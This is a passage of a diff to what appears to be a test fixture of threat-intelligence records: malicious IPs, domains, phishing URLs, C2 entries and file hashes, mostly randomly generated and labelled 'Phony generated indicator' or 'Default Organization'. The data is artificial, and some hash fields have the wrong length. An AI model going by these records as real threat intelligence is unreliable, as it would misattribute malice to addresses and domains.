"/api/v1/intelligence/P18360954259/"} -{"confidence": -1, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "510,513,848", "detail": "", "date_first": "2020-10-09T18:33:51", "source": "Phony generated indicator", "state": "active", "update_id": 1142201825, "maltype": "malware:02t7-", "detail2": "imported by user 621", "value_type": "md5", "md5": "3f6f09f334644cc346c5287ea1b882dc", "source_feed_id": 1791, "id": 1934575663, "date_last": "2020-10-09T18:33:51", "resource_uri": "/api/v1/intelligence/P19488087496/"} -{"confidence": 30, "itype": "scan_ip", "severity": "medium", "classification": "private", "country": "VN", "date_first": "2020-10-09T18:33:57", "detail": "tf5", "lat": 72, "source": "Phony generated indicator", "state": "active", "update_id": 3964602459, "date_last": "2020-10-09T18:33:57", "trusted_circle_ids": "700", "srcip": "192.0.2.71", "detail2": "imported by user 601", "value_type": "ip", "source_feed_id": 571, "id": 1272291122, "maltype": "malware:rsb5ngghr", "resource_uri": "/api/v1/intelligence/P16583752489/"} -{"confidence": 79, "itype": "scan_ip", "severity": "low", "classification": "private", "country": "DE", "date_first": "2020-10-09T18:34:00", "detail": "", "lat": -58, "source": "Phony generated indicator", "state": "active", "update_id": 2657223507, "date_last": "2020-10-09T18:34:00", "trusted_circle_ids": "803,69", "srcip": "192.0.2.235", "detail2": "imported by user 626", "value_type": "ip", "source_feed_id": 1177, "id": 1668635783, "maltype": "malware:vmnc9l", "resource_uri": "/api/v1/intelligence/P34957223138/"} -{"confidence": -1, "itype": "phish_url", "severity": "high", "classification": "private", "url": "http://ympwx2jf1.example.net/890p6/iguh3?5jy=fahiq4", "country": "US", "date_first": "2020-10-09T18:34:00", "detail": "yf49u", "lat": -83, "source": "Phony generated indicator", "state": "active", "update_id": 1543283855, "date_last": "2020-10-09T18:34:00", "trusted_circle_ids": "811,902,371", "srcip": "203.0.113.95", "detail2": "imported by user 121", "value_type": "url", "source_feed_id": 719, "id": 1137463089, "maltype": "malware:h51vga", "resource_uri": "/api/v1/intelligence/P18958880936/"} -{"confidence": 8, "itype": "scan_ip", "severity": "high", "classification": "private", "country": "IN", "date_first": "2020-10-09T18:34:00", "detail": "", "lat": 75, "source": "Phony generated indicator", "state": "active", "update_id": 1628664867, "date_last": "2020-10-09T18:34:00", "trusted_circle_ids": "631,979,873", "srcip": "203.0.113.175", "detail2": "imported by user 167", "value_type": "ip", "source_feed_id": 2012, "id": 1146448215, "maltype": "malware:wzzptkr", "resource_uri": "/api/v1/intelligence/P20038844379/"} -{"confidence": 37, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "952", "detail": "vq2o7pjq,tdc6q", "date_first": "2020-10-09T18:34:02", "source": "Phony generated indicator", "state": "active", "update_id": 3699527729, "maltype": "malware:pcy1a", "detail2": "imported by user 785", "value_type": "md5", "md5": "0b8fe53828f507e8b1572464e8beb8d2", "source_feed_id": 2054, "id": 3342007313, "date_last": "2020-10-09T18:34:02", "resource_uri": "/api/v1/intelligence/P36611314384/"} -{"confidence": 2, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "820", "detail": "8z4eg6,xjauqb", "date_first": "2020-10-09T18:34:05", "source": "Phony generated indicator", "state": "active", "update_id": 3409540543, "maltype": "malware:ae6", "detail2": "imported by user 789", "value_type": "md5", "md5": "21ed28c2da7c8adddde64ccacd40ce3f52dee0ea", "source_feed_id": 3508, "id": 2108441946, "date_last": "2020-10-09T18:34:05", "resource_uri": "/api/v1/intelligence/P17045327948/"} -{"confidence": 40, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "392,229,422", "detail": "", "date_first": "2020-10-09T18:34:11", "source": "Phony generated indicator", "state": "active", "update_id": 1815840512, "maltype": "malware:8jbxuap", "detail2": "imported by user 719", "value_type": "md5", "md5": "553c1e7e4db2069f8609d022e544a59e", "source_feed_id": 3692, "id": 1343445259, "date_last": "2020-10-09T18:34:11", "resource_uri": "/api/v1/intelligence/P13310857660/"} -{"confidence": 23, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "700,516,849", "detail": "", "date_first": "2020-10-09T18:34:12", "source": "Phony generated indicator", "state": "active", "update_id": 3554320846, "maltype": "malware:q2i-", "detail2": "imported by user 103", "value_type": "md5", "md5": "1ec74325ddc9654875de312995aa10d3ec4fb602b6341d99543df2ee8682f2db", "source_feed_id": 997, "id": 1630307640, "date_last": "2020-10-09T18:34:12", "resource_uri": "/api/v1/intelligence/P29544608921/"} -{"confidence": 91, "itype": "phish_url", "severity": "low", "classification": "private", "url": "http://46c1divph.example.com/orp/hvq262r?i0bgqt=ng7", "country": "US", "date_first": "2020-10-09T18:34:17", "detail": "s84k3bdjq", "lat": 32, "source": "Phony generated indicator", "state": "active", "update_id": 2877503512, "date_last": "2020-10-09T18:34:17", "trusted_circle_ids": "810,945", "srcip": "203.0.113.90", "detail2": "imported by user 52", "value_type": "url", "source_feed_id": 2567, "id": 2897748835, "maltype": "malware:h9k", "resource_uri": "/api/v1/intelligence/P41345577982/"} -{"confidence": 32, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "273,433,607", "detail": "9if35ri,x9mh2nmp", "date_first": "2020-10-09T18:34:20", "source": "Phony generated indicator", "state": "active", "update_id": 1488878245, "maltype": "malware:yaod", "detail2": "imported by user 711", "value_type": "md5", "md5": "a702f234e4325d2d0873ee0df36ec5ed", "source_feed_id": 2322, "id": 3274675511, "date_last": "2020-10-09T18:34:20", "resource_uri": "/api/v1/intelligence/P45003453869/"} -{"confidence": 20, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "428", "detail": "qok4w,c57f", "date_first": "2020-10-09T18:34:20", "source": "Phony generated indicator", "state": "active", "update_id": 1123945820, "maltype": "malware:l4pxxd", "detail2": "imported by user 925", "value_type": "md5", "md5": "1c8f45e88808d5b8a1c30f5702aebf15", "source_feed_id": 2655, "id": 1030722740, "date_last": "2020-10-09T18:34:20", "resource_uri": "/api/v1/intelligence/P48506246601/"} -{"confidence": 74, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "866", "detail": "ysx9,9lz-", "date_first": "2020-10-09T18:34:32", "source": "Phony generated indicator", "state": "active", "update_id": 3494659712, "maltype": "malware:byzh4", "detail2": "imported by user 530", "value_type": "md5", "md5": "93704cc3891baa0a9b16dafad00014d6", "source_feed_id": 3111, "id": 1593012346, "date_last": "2020-10-09T18:34:32", "resource_uri": "/api/v1/intelligence/P29641147646/"} -{"confidence": 66, "itype": "mal_md5", "severity": "high", "classification": "private", "trusted_circle_ids": "781,694", "detail": "", "date_first": "2020-10-09T18:34:32", "source": "Phony generated indicator", "state": "active", "update_id": 2409760108, "maltype": "malware:wpa6yzhs", "detail2": "imported by user 219", "value_type": "md5", "md5": "ab9e633068964a987f98d2a37990d3121950c560a01ae70f29459473982d8110", "source_feed_id": 2607, "id": 3246059116, "date_last": "2020-10-09T18:34:32", "resource_uri": "/api/v1/intelligence/P43119043261/"} -{"confidence": 74, "itype": "mal_md5", "severity": "very-high", "classification": "private", "trusted_circle_ids": "289,549,398", "detail": "", "date_first": "2020-10-09T18:34:39", "source": "Phony generated indicator", "state": "active", "update_id": 3725628559, "maltype": "malware:5qar", "detail2": "imported by user 562", "value_type": "md5", "md5": "2659963ab036c0ecea30aeb07add719a69ef7a4539b15babaffbca4b8eaac524", "source_feed_id": 3860, "id": 3562521087, "date_last": "2020-10-09T18:34:39", "resource_uri": "/api/v1/intelligence/P14872208985/"} -{"confidence": 42, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "65,853", "detail": "-fk,s7w8", "date_first": "2020-10-09T18:34:40", "source": "Phony generated indicator", "state": "active", "update_id": 3830742455, "maltype": "malware:oz3", "detail2": "imported by user 592", "value_type": "md5", "md5": "f2759054c256666baec126b4548cfcccab4a34cd58f7ba5796a23ca55220f99b", "source_feed_id": 3217, "id": 1329604422, "date_last": "2020-10-09T18:34:40", "resource_uri": "/api/v1/intelligence/P49868900128/"} -{"confidence": 44, "itype": "scan_ip", "severity": "low", "classification": "private", "country": "VN", "date_first": "2020-10-09T18:34:41", "detail": "", "lat": -58, "source": "Phony generated indicator", "state": "active", "update_id": 3439346683, "date_last": "2020-10-09T18:34:41", "trusted_circle_ids": "614", "srcip": "192.0.2.202", "detail2": "imported by user 591", "value_type": "ip", "source_feed_id": 2389, "id": 1109013844, "maltype": "malware:t-b-", "resource_uri": "/api/v1/intelligence/P48450091770/"} -{"confidence": 26, "itype": "phish_url", "severity": "low", "classification": "private", "url": "https://nu3pkz0gp.example.com/ofe/xp4?u06=p1fy", "country": "US", "date_first": "2020-10-09T18:34:43", "detail": "lp1hx7", "lat": 18, "source": "Phony generated indicator", "state": "active", "update_id": 1089556870, "date_last": "2020-10-09T18:34:43", "trusted_circle_ids": "162,568,318", "srcip": "203.0.113.248", "detail2": "imported by user 470", "value_type": "url", "source_feed_id": 603, "id": 3666310702, "maltype": "malware:ggxxp7y", "resource_uri": "/api/v1/intelligence/P37597023286/"} -{"confidence": 77, "itype": "mal_md5", "severity": "high", "classification": "public", "trusted_circle_ids": "84,117,138", "detail": "", "date_first": "2020-10-09T18:34:48", "source": "Phony generated indicator", "state": "active", "update_id": 2784682086, "maltype": "malware:0o15t", "detail2": "imported by user 376", "value_type": "md5", "md5": "5175e79b537c5e4c8fc586506a17d4a08ef72e3d02e0966df92dabe67c3536a5", "source_feed_id": 3656, "id": 2086698854, "date_last": "2020-10-09T18:34:48", "resource_uri": "/api/v1/intelligence/P46901644496/"} -{"confidence": 89, "itype": "mal_md5", "severity": "low", "classification": "public", "trusted_circle_ids": "19,635", "detail": "", "date_first": "2020-10-09T18:34:53", "source": "Phony generated indicator", "state": "active", "update_id": 3128675349, "maltype": "malware:26jiu2", "detail2": "imported by user 68", "value_type": "md5", "md5": "3aef2087652ab8e68ac26856047aba541618402f", "source_feed_id": 3084, "id": 3363945975, "date_last": "2020-10-09T18:34:53", "resource_uri": "/api/v1/intelligence/P16291577371/"} -{"confidence": 90, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "689,5", "detail": "", "date_first": "2020-10-09T18:34:53", "source": "Phony generated indicator", "state": "active", "update_id": 3111021927, "maltype": "malware:k77uhj1cg", "detail2": "imported by user 959", "value_type": "md5", "md5": "7dc878fb531ddcabbe78970e2a5e7dec16050d97", "source_feed_id": 2797, "id": 2207504395, "date_last": "2020-10-09T18:34:53", "resource_uri": "/api/v1/intelligence/P37532564131/"} -{"confidence": 77, "itype": "phish_url", "severity": "high", "classification": "public", "url": "https://kgb.example.com/otew68s/5rz78r?ld2u5v6oe=qfk", "country": "US", "date_first": "2020-10-09T18:34:54", "detail": "asg", "lat": -89, "source": "Phony generated indicator", "state": "active", "update_id": 3748962180, "date_last": "2020-10-09T18:34:54", "trusted_circle_ids": "436", "srcip": "203.0.113.7", "detail2": "imported by user 144", "value_type": "url", "source_feed_id": 2174, "id": 1060878284, "maltype": "malware:eeb8", "resource_uri": "/api/v1/intelligence/P10417746248/"} -{"confidence": 53, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "671,742", "detail": "", "date_first": "2020-10-09T18:34:55", "source": "Phony generated indicator", "state": "active", "update_id": 2408685330, "maltype": "malware:6tvgh", "detail2": "imported by user 76", "value_type": "md5", "md5": "893b6eb682faaa4a5e2df10e0285fa81439a0493fe3a3baea5f1b61609be1683", "source_feed_id": 1089, "id": 3763341250, "date_last": "2020-10-09T18:34:55", "resource_uri": "/api/v1/intelligence/P32928318516/"} -{"confidence": 15, "itype": "mal_md5", "severity": "medium", "classification": "private", "trusted_circle_ids": "741", "detail": "", "date_first": "2020-10-09T18:35:01", "source": "Phony generated indicator", "state": "active", "update_id": 2469286727, "maltype": "malware:ozs8vla", "detail2": "imported by user 794", "value_type": "md5", "md5": "184d266fe8364f81f048d7bb961ec8d8e04d8a2c4855ce26bc8df8d39a5c03e9", "source_feed_id": 1653, "id": 3171501405, "date_last": "2020-10-09T18:35:01", "resource_uri": "/api/v1/intelligence/P13696777986/"} -{"confidence": 61, "itype": "mal_md5", "severity": "medium", "classification": "public", "trusted_circle_ids": "376,145", "detail": "", "date_first": "2020-10-09T18:35:01", "source": "Phony generated indicator", "state": "active", "update_id": 2239822164, "maltype": "malware:qhy", "detail2": "imported by user 243", "value_type": "md5", "md5": "3185888aea88093a8c05acbe10e391a1", "source_feed_id": 1480, "id": 3882686611, "date_last": "2020-10-09T18:35:01", "resource_uri": "/api/v1/intelligence/P45333190544/"} -{"confidence": 7, "itype": "phish_url", "severity": "high", "classification": "public", "url": "http://qshvnx7vp.example.com/ljq/l0i2tg?h8cm3=scs", "country": "US", "date_first": "2020-10-09T18:35:04", "detail": "9xu5", "lat": -2, "source": "Phony generated indicator", "state": "active", "update_id": 3756663921, "date_last": "2020-10-09T18:35:04", "trusted_circle_ids": "89", "srcip": "203.0.113.121", "detail2": "imported by user 979", "value_type": "url", "source_feed_id": 3918, "id": 1809518847, "maltype": "malware:6oli4", "resource_uri": "/api/v1/intelligence/P40743258703/"} -{"confidence": 28, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "316,209,234", "detail": "r9b,ykp2g471h", "date_first": "2020-10-09T18:35:06", "source": "Phony generated indicator", "state": "active", "update_id": 1496811209, "maltype": "malware:cuasj", "detail2": "imported by user 42", "value_type": "md5", "md5": "b405905852b96fcafbd9fba750eb226cf6aec873", "source_feed_id": 536, "id": 1429560952, "date_last": "2020-10-09T18:35:06", "resource_uri": "/api/v1/intelligence/P10455681703/"} -{"confidence": 44, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "538", "detail": "", "date_first": "2020-10-09T18:35:22", "source": "Phony generated indicator", "state": "active", "update_id": 3631889422, "maltype": "malware:-gzgl", "detail2": "imported by user 879", "value_type": "md5", "md5": "a73b09a46b54533a3ad55671cedc70c0", "source_feed_id": 2996, "id": 3146369327, "date_last": "2020-10-09T18:35:22", "resource_uri": "/api/v1/intelligence/P38156699638/"} -{"confidence": 6, "itype": "mal_url", "severity": "low", "classification": "public", "url": "http://00969f0-n.example.org/k93fd0h1/nlbju?umv8isd1=nxpec6syr", "country": "US", "date_first": "2020-10-09T18:44:01", "detail": "first_seen=2020-07-02T18:43:33,IP=2001:db8:efcb:7e8d:f286:618a:aa8d:4ea6,35zuzt6,4h0l,mask=192.0.2.185,popularity=high", "lat": 88, "source": "Phony generated indicator", "state": "active", "update_id": 2805015861, "date_last": "2020-10-09T18:44:01", "trusted_circle_ids": "167,928", "srcip": "2001:db8:7f90:ceb6:ef35:8bdd:84ea:f342", "detail2": "imported by user 973", "value_type": "url", "source_feed_id": 2355, "id": 1440235585, "maltype": "malware:xex7", "resource_uri": "/api/v1/intelligence/P17911019420/"} -{"confidence": 63, "itype": "phish_url", "severity": "low", "classification": "private", "url": "http://r0i1nfo.example.org/7c6/qpl4?7nbpkro7e=uasv", "country": "US", "date_first": "2020-10-09T18:44:04", "detail": "i969g", "lat": -85, "source": "Phony generated indicator", "state": "active", "update_id": 1378458808, "date_last": "2020-10-09T18:44:04", "trusted_circle_ids": "591", "srcip": "192.0.2.110", "detail2": "imported by user 564", "value_type": "url", "source_feed_id": 2929, "id": 1433458167, "maltype": "malware:i7ht2", "resource_uri": "/api/v1/intelligence/P15808412684/"} -{"confidence": 62, "itype": "mal_domain", "severity": "medium", "classification": "private", "trusted_circle_ids": "837,163,161", "detail": "08dc6,tpf9", "date_first": "2020-10-09T18:44:19", "source": "Phony generated indicator", "state": "active", "update_id": 3546281263, "domain": "vcqa.example.org", "maltype": "malware:b8x26", "detail2": "imported by user 127", "value_type": "domain", "source_feed_id": 1037, "id": 1294078108, "date_last": "2020-10-09T18:44:19", "resource_uri": "/api/v1/intelligence/P45352123315/"} -{"confidence": 48, "itype": "mal_ip", "severity": "medium", "classification": "private", "country": "RU", "date_first": "2020-10-09T18:44:27", "detail": "first_seen=2020-12-11T20:34:53,IP=2001:db8:45b0:47d5:a669:470f:f1c7:98f3,1a9,-t48neqp,mask=203.0.113.103,popularity=high", "lat": -12, "source": "Phony generated indicator", "state": "active", "update_id": 1313784773, "date_last": "2020-10-09T18:44:27", "trusted_circle_ids": "673,824", "srcip": "2001:db8:5f1b:7b08:d21b:a709:c09d:7e6a", "detail2": "imported by user 639", "value_type": "ip", "source_feed_id": 362, "id": 1511418293, "maltype": "malware:5f7fl8", "resource_uri": "/api/v1/intelligence/P35745220427/"} -{"confidence": 28, "itype": "phish_url", "severity": "medium", "classification": "private", "url": "https://nvm.example.com/j6c4qca/7cr?l-k=j1mn1atjx", "country": "US", "date_first": "2020-10-09T18:44:35", "detail": "gdhq2ll", "lat": 26, "source": "Phony generated indicator", "state": "active", "update_id": 1497617707, "date_last": "2020-10-09T18:44:35", "trusted_circle_ids": "566,118,724", "srcip": "2001:db8:f5be:6f90:1706:81b0:ff8c:ef43", "detail2": "imported by user 830", "value_type": "url", "source_feed_id": 1272, "id": 3975421809, "maltype": "malware:8s1xc2pux", "resource_uri": "/api/v1/intelligence/P28391706982/"} -{"confidence": 69, "itype": "phish_url", "severity": "high", "classification": "public", "url": "https://lhxu0n.example.com/am4eeouw0/xtjfyuv9k?quwk=w9w51hvm1", "country": "US", "date_first": "2020-10-09T18:44:36", "detail": "vbfuqb4", "lat": -4, "source": "Phony generated indicator", "state": "active", "update_id": 1961553756, "date_last": "2020-10-09T18:44:36", "trusted_circle_ids": "800,165", "srcip": "203.0.113.74", "detail2": "imported by user 45", "value_type": "url", "source_feed_id": 3644, "id": 1443597660, "maltype": "malware:emr5clr", "resource_uri": "/api/v1/intelligence/P30565642492/"} -{"confidence": 10, "itype": "mal_url", "severity": "low", "classification": "public", "url": "https://5uv.example.com/3a3bjy7e0/m61?twlj=e9b", "country": "IN", "date_first": "2020-10-09T18:44:37", "detail": "first_seen=2020-06-11T19:13:54,IP=2001:db8:3736:1dd3:541e:2aff:52c0:2913,bl3l,jxut5e,mask=2001:db8:f42a:81bd:feb1:de48:5295:9624,popularity=high", "lat": 86, "source": "Phony generated indicator", "state": "active", "update_id": 2487763029, "date_last": "2020-10-09T18:44:37", "trusted_circle_ids": "597", "srcip": "203.0.113.101", "detail2": "imported by user 348", "value_type": "url", "source_feed_id": 2960, "id": 2556802895, "maltype": "malware:tqgj2cw", "resource_uri": "/api/v1/intelligence/P27503502122/"} -{"confidence": 40, "itype": "phish_url", "severity": "high", "classification": "public", "url": "https://hxb.example.org/wydk7iaq/nl5ei-?m40=ifyub0", "country": "US", "date_first": "2020-10-09T18:44:45", "detail": "rj3", "lat": 25, "source": "Phony generated indicator", "state": "active", "update_id": 2518532305, "date_last": "2020-10-09T18:44:45", "trusted_circle_ids": "902,209,207", "srcip": "2001:db8:58d5:f56d:793f:f377:133a:a157", "detail2": "imported by user 517", "value_type": "url", "source_feed_id": 2954, "id": 2293146712, "maltype": "malware:ullzh-dc", "resource_uri": "/api/v1/intelligence/P26986043169/"} -{"confidence": 100, "itype": "mal_ip", "severity": "low", "classification": "private", "country": "CN", "date_first": "2020-10-09T18:44:47", "detail": "first_seen=2020-11-06T09:05:54,IP=192.0.2.6,zmv,8rc7,mask=203.0.113.29,popularity=low", "lat": 73, "source": "Phony generated indicator", "state": "active", "update_id": 2356107596, "date_last": "2020-10-09T18:44:47", "trusted_circle_ids": "896,971,86", "srcip": "2001:db8:45e:91f2:b85b:f55e:ec:c99b", "detail2": "imported by user 184", "value_type": "ip", "source_feed_id": 1741, "id": 3717183958, "maltype": "malware:qyv3", "resource_uri": "/api/v1/intelligence/P34507990876/"} -{"confidence": 95, "itype": "mal_domain", "severity": "very-high", "classification": "public", "country": "HK", "date_first": "2020-10-09T18:44:50", "detail": "first_seen=2020-01-20T22:15:43,50mk,8hobd4b,mask=2001:db8:3154:1044:aecb:974:a819:db23,popularity=high", "lat": 21, "source": "Phony generated indicator", "state": "active", "update_id": 1102962906, "date_last": "2020-10-09T18:44:50", "domain": "qzn7l7r.example.com", "trusted_circle_ids": "347", "srcip": "192.0.2.162", "detail2": "imported by user 501", "value_type": "domain", "source_feed_id": 204, "id": 3032566612, "maltype": "malware:sqa", "resource_uri": "/api/v1/intelligence/P20301758213/"} -{"confidence": 61, "itype": "mal_url", "severity": "low", "classification": "private", "url": "https://9nuct.example.net/4lk8nqz5/kuo9fudzy?zbyr=stin", "trusted_circle_ids": "238,448", "detail": "first_seen=2020-03-21T00:08:51,vf5qs,tr4cn6xm,mask=192.0.2.118,popularity=high", "date_first": "2020-10-09T18:44:50", "source": "Phony generated indicator", "state": "active", "update_id": 1515697097, "maltype": "malware:c4pwz", "detail2": "imported by user 751", "value_type": "url", "source_feed_id": 3273, "id": 3340693286, "date_last": "2020-10-09T18:44:50", "resource_uri": "/api/v1/intelligence/P35426830357/"} -{"confidence": 83, "itype": "phish_url", "severity": "low", "classification": "public", "url": "https://zwi3xpen.example.net/5gbafknb5/uh0?63ockn=muc83xay", "country": "US", "date_first": "2020-10-09T18:44:54", "detail": "mfmbtgkgf", "lat": 79, "source": "Phony generated indicator", "state": "active", "update_id": 3921339680, "date_last": "2020-10-09T18:44:54", "trusted_circle_ids": "237,85,838", "srcip": "203.0.113.96", "detail2": "imported by user 552", "value_type": "url", "source_feed_id": 3329, "id": 3739083046, "maltype": "malware:spzd6p0k-", "resource_uri": "/api/v1/intelligence/P18267744040/"} -{"confidence": 26, "itype": "phish_url", "severity": "very-high", "classification": "public", "url": "https://d12euhi.example.net/urk/c4ehmzh?ed7jn5mc=fw5yh", "country": "US", "date_first": "2020-10-09T18:44:58", "detail": "4dq9lcbg", "lat": -71, "source": "Phony generated indicator", "state": "active", "update_id": 1879291625, "date_last": "2020-10-09T18:44:58", "trusted_circle_ids": "289,915,200", "srcip": "203.0.113.237", "detail2": "imported by user 625", "value_type": "url", "source_feed_id": 2511, "id": 3625463685, "maltype": "malware:kylfp", "resource_uri": "/api/v1/intelligence/P22682684773/"} -{"confidence": 41, "itype": "mal_ip", "severity": "high", "classification": "private", "country": "IN", "date_first": "2020-10-09T18:45:05", "detail": "first_seen=2020-06-19T01:55:52,IP=192.0.2.120,wumuemdq7,8vqyydk,mask=192.0.2.216,popularity=high", "lat": -81, "source": "Phony generated indicator", "state": "active", "update_id": 1439822739, "date_last": "2020-10-09T18:45:05", "trusted_circle_ids": "901,40,613", "srcip": "203.0.113.8", "detail2": "imported by user 110", "value_type": "ip", "source_feed_id": 3665, "id": 1735603283, "maltype": "malware:fz-8ge7r", "resource_uri": "/api/v1/intelligence/P33397103833/"} -{"itype": "mal_ip", "classification": "private", "lat": 32, "update_id": 1885802687, "maltype": "malware:8bu7kbgku", "source_feed_id": 2835, "id": 3775312524, "confidence": -1, "severity": "very-high", "trusted_circle_ids": "977,176", "lon": -102, "date_first": "2021-04-07T13:10:07", "source": "Phony generated indicator", "state": "active", "import_session_id": 3288, "value_type": "ip", "srcip": "192.0.2.168", "org": "Level 3 Communications", "asn": "3356", "date_last": "2021-04-19T08:57:46", "country": "US", "detail2": "imported by user 807", "resource_uri": "/api/v1/intelligence/P22317506075/"} -{"confidence": 71, "itype": "apt_ip", "severity": "low", "classification": "private", "trusted_circle_ids": "863", "date_first": "2021-04-29T16:02:17", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 637", "srcip": "192.0.2.89", "update_id": 2953128283, "value_type": "ip", "source_feed_id": 779, "id": 1060450578, "date_last": "2021-04-29T16:02:17", "resource_uri": "/api/v1/intelligence/P34605333513/"} -{"confidence": -1, "itype": "ssh_ip", "severity": "low", "classification": "public", "trusted_circle_ids": "0,356,274", "date_first": "2021-04-29T16:02:23", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 800", "srcip": "203.0.113.234", "update_id": 1775579068, "value_type": "ip", "source_feed_id": 2934, "id": 2510016514, "date_last": "2021-04-29T16:02:23", "resource_uri": "/api/v1/intelligence/P23251399340/"} -{"confidence": 34, "itype": "i2p_ip", "severity": "very-high", "classification": "private", "trusted_circle_ids": "884,207", "date_first": "2021-04-29T16:02:24", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 764", "srcip": "192.0.2.234", "update_id": 1042850710, "value_type": "ip", "source_feed_id": 138, "id": 2250119169, "date_last": "2021-04-29T16:02:24", "resource_uri": "/api/v1/intelligence/P17379626790/"} -{"confidence": -1, "itype": "parked_ip", "severity": "very-high", "classification": "private", "trusted_circle_ids": "762,65", "date_first": "2021-04-29T16:02:25", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 297", "srcip": "2001:db8:e4a1:e034:4a78:d136:9737:696b", "update_id": 3793745757, "value_type": "ip", "source_feed_id": 3287, "id": 2828541076, "date_last": "2021-04-29T16:02:25", "resource_uri": "/api/v1/intelligence/P34744569898/"} -{"confidence": 71, "itype": "tor_ip", "severity": "low", "classification": "public", "trusted_circle_ids": "214,141,167", "date_first": "2021-04-29T16:02:25", "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 34", "srcip": "2001:db8:2d93:20c1:5b74:1b32:1ef7:fdc4", "update_id": 3282566579, "value_type": "ip", "source_feed_id": 402, "id": 1539625423, "date_last": "2021-04-29T16:02:25", "resource_uri": "/api/v1/intelligence/P42405092601/"} -{"confidence": 73, "itype": "c2_ip", "severity": "medium", "classification": "private", "trusted_circle_ids": "738", "detail": "5kbfbph", "date_first": "2021-04-29T16:02:26", "source": "Phony generated indicator", "state": "active", "update_id": 2203949954, "maltype": "malware:nz184x2", "srcip": "203.0.113.1", "detail2": "imported by user 942", "value_type": "ip", "source_feed_id": 1769, "id": 2667774876, "date_last": "2021-04-29T16:02:26", "resource_uri": "/api/v1/intelligence/P41901040968/"} \ No newline at end of file +{"domain": "d4xgfj.example.net", "itype": "mal_domain", "classification": "public", "lat": -49.1, "update_id": 3786618776, "source_feed_id": 3143, "id": 3135167627, "confidence": 20, "severity": "high", "trusted_circle_ids": "122", "lon": 94.4, "date_first": "2020-10-08T12:21:50", "source": "Default Organization", "state": "active", "import_session_id": 1400, "value_type": "domain", "srcip": "89.160.20.156", "org": "OVH Hosting", "date_last": "2020-10-08T12:24:42", "country": "FR", "detail2": "imported by user 184", "resource_uri": "/api/v1/intelligence/P46279656657/"} +{"confidence": 51, "itype": "mal_ip", "severity": "low", "classification": "private", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "RU", "update_id": 3311633654, "lon": -64.7, "id": 2465691587, "source": "Default Organization", "state": "active", "detail2": "imported by user 979", "trusted_circle_ids": "355,386,461", "import_session_id": 1934, "lat": -51.2, "org": "IP Khnykin Vitaliy Yakovlevich", "value_type": "ip", "source_feed_id": 639, "date_first": "2020-10-08T12:21:59", "date_last": "2020-10-08T12:24:42", "resource_uri": "/api/v1/intelligence/P26893014825/"} +{"itype": "mal_ip", "classification": "public", "lat": 38.4, "update_id": 1860329541, "source_feed_id": 2564, "date_first": "2020-10-08T12:22:11", "confidence": 24, "severity": "high", "trusted_circle_ids": "954,740", "lon": 0.0, "id": 1886961414, "source": "Default Organization", "state": "active", "import_session_id": 3569, "value_type": "ip", "srcip": "192.168.2.8", "org": "Cox Communications", "asn": "22773", "date_last": "2020-10-08T12:24:42", "country": "US", "detail2": "imported by user 830", "resource_uri": "/api/v1/intelligence/P16938191113/"} +{"confidence": 56, "itype": "mal_md5", "severity": "very-high", "classification": "public", "trusted_circle_ids": "439,942,801", "id": 1785659799, "source": "Default Organization", "state": "active", "detail2": "imported by user 723", "import_session_id": 244, "update_id": 3898969521, "value_type": "md5", "resource_uri": "/api/v1/intelligence/P44706407813/", "source_feed_id": 3759, "date_first": "2020-10-08T12:22:16", "date_last": "2020-10-08T12:24:42", "md5": "6466e2"} +{"itype": "mal_ip", "classification": "private", "lat": -64.8, "update_id": 1925356831, "source_feed_id": 1834, "date_first": "2020-10-08T12:28:50", "confidence": 61, "severity": "very-high", "trusted_circle_ids": "310,709,553", "lon": -129.3, "id": 2788278724, "source": "Default Organization", "state": "active", "import_session_id": 3146, "value_type": "ip", "srcip": "192.168.2.235", "org": "Spectrum", "asn": "20001", "date_last": "2020-10-09T18:49:37", "country": "US", "detail2": "imported by user 16", "resource_uri": "/api/v1/intelligence/P39996084337/"} +{"itype": "mal_ip", "classification": "public", "lat": 72.1, "update_id": 1327494837, "source_feed_id": 2122, "date_first": "2020-10-08T12:29:01", "confidence": 31, "severity": "low", "trusted_circle_ids": "811,297", "lon": -52.2, "id": 2979716207, "source": "Default Organization", "state": "active", "import_session_id": 2369, "value_type": "ip", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "org": "Spectrum", "asn": "11351", "date_last": "2020-10-09T18:49:37", "country": "US", "detail2": "imported by user 659", "resource_uri": "/api/v1/intelligence/P24601068254/"} +{"confidence": 72, "itype": "c2_domain", "severity": "very-high", "classification": "private", "srcip": "89.160.20.156", "trusted_circle_ids": "238,259,537", "update_id": 1356750652, "detail": "3vzmr9,Botnet-VXPC5QK8T,popularity=high,type=2,first_seen=2020-07-24T07:36:41,Botnet-1QZ2U,mask=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,popularity=high,threat=jn4", "id": 3763825895, "source": "Default Organization", "state": "active", "detail2": "imported by user 50", "domain": "ei1im6skd.example.com", "lat": 85.1, "maltype": "malware:r47agu9", "value_type": "domain", "source_feed_id": 967, "date_first": "2020-10-09T18:14:43", "date_last": "2020-10-09T18:14:43", "resource_uri": "/api/v1/intelligence/P49850231022/"} +{"confidence": 60, "itype": "mal_md5", "severity": "low", "classification": "private", "trusted_circle_ids": "455,761,112", "id": 3178646499, "source": "Default Organization", "state": "active", "detail2": "imported by user 167", "update_id": 1585930018, "value_type": "md5", "resource_uri": 